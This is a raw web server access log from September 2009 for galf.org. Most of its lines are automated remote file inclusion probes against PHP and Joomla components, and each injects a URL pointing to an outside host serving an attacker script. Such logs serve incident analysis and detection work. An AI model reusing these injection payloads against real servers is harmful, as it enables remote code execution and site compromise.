190.144.44.36 - - [07/Sep/2009:08:25:16 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:32 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:32 -0700] "GET /logs/access_090216.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:32 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:32 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:32 -0700] "GET /logs/access_090216.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:33 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:33 -0700] "GET /logs/access_090216.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:33 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:33 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:33 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:25:37 -0700] "GET /logs/access.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:25:55 -0700] "GET /snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:25:55 -0700] "GET /logs//snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:25:56 -0700] "GET /logs/access_090309.log%20%20//snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:26:02 -0700] "GET /snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:26:02 -0700] "GET /logs//snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:26:02 -0700] "GET /logs/access_090309.log%20%20//snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:08:26:41 -0700] "GET /logs/access.log//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:08:26:42 -0700] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
217.117.85.108 - - [07/Sep/2009:08:27:09 -0700] "GET /logs/access.log%20%20/errors.php?error=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.6.22.182 - - [07/Sep/2009:08:27:16 -0700] "GET /?N=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:27:22 -0700] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:27:22 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:27:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:08:31:11 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:08:31:12 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.182 - - [07/Sep/2009:08:31:12 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:08:31:13 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:08:31:27 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:08:31:29 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.120.90.223 - - [07/Sep/2009:08:31:30 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://shanghaisisa.com/skin/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:31:38 -0700] "GET /logs/access_090420.log%20%20//snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
59.150.247.202 - - [07/Sep/2009:08:31:49 -0700] "GET /logs/access_090420.log%20%20//snippet.reflect.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:34:01 -0700] "GET /logs/access_090706.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:34:01 -0700] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:34:01 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Sep/2009:08:35:57 -0700] "GET /logs/access_090629.log%20%20///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://jonrothbard.com/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:36:43 -0700] "GET /logs/access_090511.log///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:36:43 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:36:45 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:36:45 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
199.96.29.70 - - [07/Sep/2009:08:37:05 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:37:54 -0700] "GET /logs/access_090525.log///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:37:58 -0700] "GET /logs/access_090525.log///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:38:14 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:38:14 -0700] "GET /logs/access_090504.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:38:14 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:38:20 -0700] "GET /logs/access_090309.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:39:04 -0700] "GET /logs/access_090504.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:39:04 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:39:04 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.23 - - [07/Sep/2009:08:39:08 -0700] "GET /logs/access_090309.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:08:39:32 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.40 - - [07/Sep/2009:08:40:14 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:08:41:05 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:08:41:43 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:41:43 -0700] "GET /logs/access_090202.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:41:43 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:41:43 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:42:08 -0700] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:08:42:29 -0700] "GET /logs/access_090525.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [07/Sep/2009:08:43:05 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://saint56.pe.kr//bbs/skin/uks_vote_v3021/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:44:09 -0700] "GET /components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:44:09 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:44:09 -0700] "GET /logs/access_090202.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:08:44:12 -0700] "GET /logs/access.log%20%20//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.254.195.7 - - [07/Sep/2009:08:45:54 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:08:47:16 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
199.96.29.70 - - [07/Sep/2009:08:51:55 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
199.96.29.70 - - [07/Sep/2009:08:51:55 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
199.96.29.70 - - [07/Sep/2009:08:51:55 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:53:09 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:08:53:09 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:08:53:09 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
121.254.195.7 - - [07/Sep/2009:08:53:36 -0700] "GET /logs/access_090119.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.254.195.7 - - [07/Sep/2009:08:53:37 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.254.195.7 - - [07/Sep/2009:08:53:37 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:38 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:38 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:38 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:48 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:48 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:49 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:49 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
66.244.236.249 - - [07/Sep/2009:08:54:49 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:08:55:01 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.50.85.104 - - [07/Sep/2009:08:55:01 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
80.67.26.40 - - [07/Sep/2009:08:55:02 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:08:55:04 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://fobe.fileave.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
190.144.44.36 - - [07/Sep/2009:08:57:50 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
209.61.244.6 - - [07/Sep/2009:08:58:32 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
209.61.244.6 - - [07/Sep/2009:08:58:32 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://megabyte.hr//images/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.galf.org"
190.144.44.36 - - [07/Sep/2009:09:00:16 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
117.110.59.2 - - [07/Sep/2009:09:00:18 -0700] "GET /logs/access_090511.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.18.168.84 - - [07/Sep/2009:09:02:28 -0700] "GET /logs/access_090511.log%20//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.18.168.84 - - [07/Sep/2009:09:02:28 -0700] "GET /include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.18.168.84 - - [07/Sep/2009:09:02:28 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.18.168.84 - - [07/Sep/2009:09:02:29 -0700] "GET /logs/access_090511.log%20//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.18.168.84 - - [07/Sep/2009:09:02:29 -0700] "GET /include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.18.168.84 - - [07/Sep/2009:09:02:29 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:02:49 -0700] "GET /logs/access_090720.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:02:49 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:02:49 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:02:57 -0700] "GET /logs/access_090720.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:02:57 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:02:57 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:03:14 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.47.188 - - [07/Sep/2009:09:03:19 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
92.50.143.90 - - [07/Sep/2009:09:03:40 -0700] "GET /logs/access_090309.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
